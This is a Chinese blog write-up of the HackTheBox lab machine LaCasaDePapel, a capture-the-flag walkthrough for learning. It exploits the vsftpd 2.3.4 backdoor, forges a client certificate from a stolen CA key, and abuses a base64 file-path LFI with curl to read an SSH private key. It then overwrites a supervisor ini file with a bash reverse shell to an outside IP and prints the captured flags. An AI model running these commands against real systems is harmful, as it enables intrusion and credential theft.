[Meachines] [Easy] LaCasaDePapel vsftpd 2.3.4 backdoor+CA证书+LFI+SSH私钥登录+nodejs-ini文件命令注入权限提升

于 2024-08-31 16:52:30 发布
阅读量294 收藏 3
点赞数 3
分类专栏: HackTheBox 文章标签: ssh 运维
Whoami? Martin
本文链接:https://blog.csdn.net/qq_51886509/article/details/141754962
版权

信息收集

IP AddressOpening Ports
10.10.10.131TCP:21,22,80,443

$ nmap -p- 10.10.10.131 --min-rate 1000 -sC -sV

PORT    STATE SERVICE  VERSION
21/tcp  open  ftp      vsftpd 2.3.4
22/tcp  open  ssh      OpenSSH 7.9 (protocol 2.0)
| ssh-hostkey: 
|   2048 03:e1:c2:c9:79:1c:a6:6b:51:34:8d:7a:c3:c7:c8:50 (RSA)
|   256 41:e4:95:a3:39:0b:25:f9:da:de:be:6a:dc:59:48:6d (ECDSA)
|_  256 30:0b:c6:66:2b:8f:5e:4f:26:28:75:0e:f5:b1:71:e4 (ED25519)
80/tcp  open  http     Node.js (Express middleware)
|_http-title: La Casa De Papel
443/tcp open  ssl/http Node.js Express framework
| ssl-cert: Subject: commonName=lacasadepapel.htb/organizationName=La Casa De Papel
| Not valid before: 2019-01-27T08:35:30
|_Not valid after:  2029-01-24T08:35:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
| tls-nextprotoneg: 
|   http/1.1
|_  http/1.0
Service Info: OS: Unix

vsftpd 2.3.4 backdoor && HTTPS

# echo '10.10.10.131 lacasadepapel.htb' >> /etc/hosts

http://lacasadepapel.htb/

image.png

https://lacasadepapel.htb/

image-1.png

$ searchsploit vsftpd 2.3.4

image-2.png

$ nc 10.10.10.131 21

user smiley:)

image-3.png

$ nc 10.10.10.131 6200

image-4.png

CA证书

ls

show $tokyo

caKey指向了/home/nairobi/ca.key

image-6.png

echo file_get_contents("/home/nairobi/ca.key")

image-7.png

$ openssl s_client -connect 10.10.10.131:443

image-8.png

现在我们已经有了 CA 证书,接下来为自己创建客户端证书。首先下载服务器证书。访问 https://10.10.10.131,然后点击 URL 地址栏上的锁定图标。接着,选择“连接”>“更多信息”>“查看证书”。然后在弹出窗口中点击“详细信息”>“导出”。

image-13.png

在此之前清除掉所有历史数据

$ openssl x509 -outform der -in lacasadepapelhtb.pem -out lacasadepapelhtb.crt

$ openssl genrsa -out client.key 4096

$ openssl req -new -key client.key -out client.csr

$ openssl x509 -req -in client.csr -CA lacasadepapelhtb.crt -CAkey ca.key -set_serial 9001 -extensions client -days 9002 -outform PEM -out client.cer

$ openssl pkcs12 -export -inkey client.key -in client.cer -out client1.p12

firefox导入该证书,并且清理浏览器缓存

image-12.png

image-15.png

再次导入lacasadepapelhtb.crt

image-16.png

image-17.png

image-18.png

注意!:这里可能无法认证成功解决方法

删除认证记录和servers历史记录后再尝试进入,可能两个不一致导致认证失败。

image-20.png

image-21.png

image-14.png

image-19.png

LFI

image-22.png

https://lacasadepapel.htb/?path=..

image-23.png

下载文件路径由base64构成

image-24.png

$ curl -k https://10.10.10.131/file/$(echo -n "../user.txt" | base64)

image-25.png

$ curl -k https://10.10.10.131/file/$(echo -n "../.ssh/id_rsa" | base64)

image-26.png
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

$ for user in berlin dali nairobi oslo professor; do ssh -oBatchMode=yes -i /tmp/id_rsa $user@10.10.10.131; done

image-28.png

User.txt

7ef30a1514740ecbc77b38a8480e2f74

权限提升

image-29.png

通过列举可知

memcached.ini存放了一个命令,并且以nobody身份执行/home/professor/memcached.js。不幸的是我们无法读取memcached.js内容。需要了解是哪个用户调用了memcached.ini

每一分钟PID都会改变,证明这个脚本都在运行。

lacasadepapel [/tmp]$ ./pspy64 -f

image-32.png

在这个目录中,我们是具有读写执行的权限,所以可以删除memcached.ini

image-30.png

lacasadepapel [~]$ rm memcached.ini

lacasadepapel [~]$ echo -e "[program:memcached]\ncommand = bash -c 'bash -i >& /dev/tcp/10.10.16.24/10032 0>&1'" > memcached.ini

image-33.png

image-34.png

Root.txt

e2e7ca9580fed250b1e825f068117633

Мартин.
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vsftpd2.3.4环境搭建-漏洞利用(笑脸漏洞)
qq_34914659的博客
08-09 3037
一、环境搭建 首先,需要找一个漏洞环境,通过fofa搜索"Vsftpd2.3.4",但是没有找到可以利用的环境,于是搭建环境 安装包在csdn上下载,需要50积分 https://download.csdn.net/download/sinat_32937525/11824028 1.靶机环境是centos7 ,首先解压缩包,并上传到靶机目录 tar -zxvf 压缩包名称 2.进入vsftpd目录,赋予文件权限,之后进行make &&a...
使用Notepad++远程编辑Ubuntu上的源码
安晓辉生涯——聚焦程序员的职业规划与成长
03-16 3576
简单搭建了在Windows上远程编辑Ubuntu Server 14.04上面源代码的环境,记录一下,给需要的人。
渗透之——Metasploit攻击VSFTPD2.3.4后门漏洞并渗透内网
冰河的专栏
01-12 6043
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86357202 攻击机:Kali 192.168.109.137 靶机:Metasploitable2 192.168.109.140 内网另一主机: Metasploitable2 192.168.109.159 工具:Metasploit 1.开启MSF msfc...
漏洞利用 --- VSFTPD 2.3.4 后门
weixin_62443409的博客
06-09 9274
VSFTPD 2.3.4 的攻击就是通过向21端口发送一个特定字节的序列来触发恶意的vsf_sysutil_extra()函数。一旦成功执行,就会在系统的6200端口打开一个后门,从而进行利用。
FTP(匿名登录)未授权访问VSFTPD2.3.4漏洞渗透
weixin_52347768的博客
05-05 1万+
漏洞扫描考察论文
VSFTPD2.3.4(笑脸漏洞)复现
柠檬i的博客
10-29 1830
vsftpd2.3.4在ftp认证时,如果用户名带有 " :) " ,那么6200端口就会存在一个root权限的shell,可以直接连接。
vsftpd2.3.4笑脸漏洞
weixin_51909453的博客
11-02 4849
vsftpd2.3.4笑脸漏洞 该版本的 VSFTPD 存在一个后门漏洞。虽然该问题迅速得到了开发人员的修复及删除,但是仍有不少人已经下载安装了该漏洞版本。这个后门的载荷以 :)字符的形式拼接在用户名上。后门代码绑定的侦听端口是 6200 。 1、靶机metasploitable2,默认登录账号和密码都是:msfadmin,登录成功后ifconfig查看靶机ip192.168.179.129 2、打开kali首先输入sudo su ,输入当前用户密码即可切换root,利用nmap -sV 192.168.
通过http协议访问FTP服务器的搭建,ftp+nginx 图片服务器搭建之后使用http访问进行配置文件的修改
Reyn_观极
06-09 5414
一 ,搭建nginx 先安装nginx服务器,见我之前写的: nginx服务器搭建 二 ,搭建ftp 在安装vsftpd服务器,ftp服务器搭建 三、开始搭建Nginx图片服务器 1、效果 例如:图片通过ftp服务上传到/home/ftpqn/date/index/date目录下,我想通过访问Nginx服务器来访问ftp目录下的图片文件,该url为https://192.168.0....
通过HTTP服务访问FTP服务器文件(配置nginx+ftp服务器)
热门推荐
低调D树苗的博客
06-18 2万+
1.前提    已安装配置好nginx+ftp服务    参考:    nginx服务安装:https://blog.csdn.net/qq_37725650/article/details/80726496    FTP服务安装:https://blog.csdn.net/qq_37725650/article/details/805900612.配置Nginx 服务器    2.1进入ngin...
vsftpd+pam+mysql.docx
05-22
接着,修改`vsftpd`配置文件`/etc/vsftpd.conf`,启用虚拟用户模式,并创建相应的系统用户和目录: ```bash # 创建虚拟用户对应的系统用户和目录 useradd -s /sbin/nologin -d /var/ftproot vuser chmod go+rx /var...
Linux 源代码 编译安装vsftpd-2.3.4
03-19
vsftpd-2.3.4”和“vsftpd”这两个文件可能是源代码或者编译后的二进制文件,具体用途需要结合实际情况分析。 总的来说,通过编译安装vsftpd-2.3.4,您可以自定义配置,实现高度定制化的FTP服务,满足各种安全和...
linux中使用Vsftpd+nginx 搭建文件服务器
01-07
搭建文件服务器 1、安装 vsftpd yum -y install vsftpd 2、给文件服务器添加一个用户 useradd ftpuser passwd ftpuser123 3、设置开机自启动 chkconfig vsftpd on vsftpd常用操作命令 启动 systemctl start ...
vsftpd 2.3.4
12-15
Linux 源代码 编译安装vsftpd-2.3.4 提供开源安全可靠的ftp服务系统 文件夹内有详细教程与配套文件 Linux 源代码 编译安装vsftpd-2.3.4的配置 Linux下FTP服务器vsftp配置大全超完整版 Linux下vsFTP配置全方案(限制...
Centos6.5全自动安装 vsftpd+dhcp+nfs+tftp
01-11
yum install tftp tftp-server vsftpd dhcp syslinux nfs-utils vim /etc/xinetd.d/tftp service tftp { disable = no socket_type = dgram protocol = udp wait = yes user = root server =
线上考试系统
qq_69194497的博客
08-27 886
Docker镜像可以通过分层来进行继承,例如,用户基于基础镜像(用来生成其他镜像的基础,往往没有父镜像)来制作各种不同的应用镜像。从Docker 的官方文档来看,Docker 容器的定义和 Docker 镜像的定义几乎是相同,Docker 容器和Docker 镜像的区别主要在于docker 容器多出了一个可写层。Docker 镜像就是一组只读的目录,或者叫只读的 Docker 容器模板,镜像中含有--件系统,所以我们说Docker 镜像是启动一个Docker 容器的基础。3.在没有镜像的情况下。
linux 系统如何进行nfs(第五节)
最新发布
weixin_44767571的博客
08-30 218
首先是 在虚拟机中的操作。然后是在开发板上的操作。
Docker容器技术
LongHongYu908的博客
08-29 706
Docker之父Docker就好比传统的货运集装箱。
VS2022打包Docker镜像
qq_41617901的博客
08-28 335
安装 Docker Desktop。.net8 分支为例。在.proj 文件加上。在根目录执行打包命令
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值